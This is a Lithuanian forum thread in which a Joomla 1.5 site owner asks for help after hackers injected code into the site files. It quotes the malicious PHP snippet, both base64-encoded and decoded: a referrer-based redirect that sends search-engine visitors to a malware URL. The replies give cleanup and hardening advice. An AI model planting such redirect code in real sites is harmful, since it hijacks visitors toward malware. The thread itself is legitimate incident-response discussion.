kenksimingo kodo pašalinimas

i tinklapi kuris sukurtas su joomla1,5 buvo isilaužta ir iterpta i failus kenksmingas kodas :

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtK

XsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddO

w0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpIGFuZCAhc3RyaXN0cigkdWFnLCJNU0lFIDYuM

CIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZm

VyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKS

BvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbW

F0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb

2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCR

yZWZlcmVyLCJmYWNlYm9vay5jb20vbCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFvbC5jb20iKSkgew0KaWYgKCFzdHJpc3RyKCRy

ZWZlcmVyLCJjYWNoZSIpIG9yICFzdHJpc3RyKCRyZWZlcmVyLCJpbnVybCIpKXsNCmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9

pYm9udHUuMjV1LmNvbS8iKTsNCmV4aXQoKTsNCn0KfQp9DQp9DQp9"));

Dėl jo nebeatdaro tinklapio, o nukreipia kitur, atidaro tik per nuorodos laukeli naršyklės viršuje

Aš jį pašalinau iš visų failų su Notepad ir tinkalpį atidaro, bet po kelių dienų vėl užkrečiami failai. Atsargines kopijos neturiu. Prašau padėti. Ačiu.

Sveikas,

užkoduotas kodas:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"live.com") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://ibontu.25u.com/");
exit();
}
}
}
}
}

Jis nukreipia lankytojus į puslapį http://ibontu.25u.com/ kurį mano antivirusinė iškart aptinka kaip "nešvarų brudą - URL: Malware" .

Patarčiau backup`inti duombazę ir perrašyti joomlą, nes gali būti paliktas "backdoor`as" tam tikram scripte. Jei to negali padaryti, tada teks peržiūrėti kodą ir taipogi pratrinti visus eval(); ir tiesiog atnaujinti joomlą, gal yra bug fix`ų.

pasitikrink savo kompiuterį ar nėra virusų, tada pasikeisk visus slaptažodžius

pasitikrink savo kompiuterį ar nėra virusų, tada pasikeisk visus slaptažodžius

???

pasitikrink savo kompiuterį ar nėra virusų, tada pasikeisk visus slaptažodžius

Jei remote hostinge, tai nemanau, jog pas jį problemą, o slaptažodį hostingo dėl visą ko tikrai reikėtų pakeisti.

???

 

 

Jei remote hostinge, tai nemanau, jog pas jį problemą, o slaptažodį hostingo dėl visą ko tikrai reikėtų pakeisti.

Na gal jis galvoja, jog kompiuteryje yra koks keylogeris per kurį įsilaužia į tinklapio FTP ir pakeičia kodus;D o koki ne?? :D

Na gal jis galvoja, jog kompiuteryje yra koks keylogeris per kurį įsilaužia į tinklapio FTP ir pakeičia kodus;D o koki ne?? :D

Dažniausiai tokios atakos yra atliekamos naudojant Google ir šviežią exploit`ą (populiaraus TVS), tada suradus puslapius naudojančius pažeidžiamas TVS, gaunami prisijungimo duomenys (dažniausiai per SQL injection bug`ą) ir įterpiamas kenkėjiškas kodas, kuris šiuo atveju siunčia lankytojų srautą į kenkėjišką svetainę, kurioje kaip suprantu bandomas išnaudoti naršyklės pažeidžiamumas.

Matyt botnetą kokie turkai konstruoja ^_^

P.S. Tu naudoji joomla 1.5 versiją, ji tiesiog pilną klaidų, bug`ų ir t.t. Dabartinė yra Joomla 2.5. Kuo greičiau atnaujink, jei tas žmogus nepasidarė pas tave backdoor`o, tada gal update`o ir užteks.

+

Dažniausiai tokios atakos yra atliekamos naudojant Google ir šviežią exploit`ą (populiaraus TVS), tada suradus puslapius naudojančius pažeidžiamas TVS, gaunami prisijungimo duomenys (dažniausiai per SQL injection bug`ą) ir įterpiamas kenkėjiškas kodas, kuris šiuo atveju siunčia lankytojų srautą į kenkėjišką svetainę, kurioje kaip suprantu bandomas išnaudoti naršyklės pažeidžiamumas.

 

Matyt botnetą kokie turkai konstruoja ^_^

Čia n+k+1 tų būdų kaip įsilaužt prie jo tų duomenų.

jommla buvau perašes,Nieko. Slaptažodžius taip pat keičiau. Naujinti nesinori, jeigu nera jau kitos iseities, teks komponentus perrayti ir dizainą naujai padaryti ant naujos verijos. O gal komponentuose atskirai ideigtuose yra skriptas.

Aš laiko neturiu užsiimti su juo. Todėl prašau pasakyti rimčiausią variantą ką daryti.

Jis nukreipia lankytojus į puslapį http://ibontu.25u.com/ kurį mano antivirusinė iškart aptinka kaip "nešvarų brudą - URL: Malware" .

Hmm, man į Bingo.com nukreipia iš karto... Gal dėl to, kad MSE antivirusinė?

Gali būti, jog tame kenkėjiškame puslapyje, po atlikto pažeidžiamumo išnaudojimo automatiškai redirectina į bingo.com, nes taip renka kazino traffica.

P.S. o gal į bing.com nukreipia, ne į bingo.com?

Isilauzimo variantai

1) naudoji ftp klienta pvz filezilla ir isimini slaptazodi, virusui paimti ji vieni niekai

2) joomlos instaliavimo menu irrasei ftp duomenis i configuration.php faila, bugo atveju - suprantama kas ivyksta( neatsimenu ar sis niuansas jau imanomas nuo 1.5 versijos)

3) kiti variantai

4) papildomi moduliai gali buti ytint nepatikimi

Visi ankstesni komentarai turi pagrindo, daryk isvadas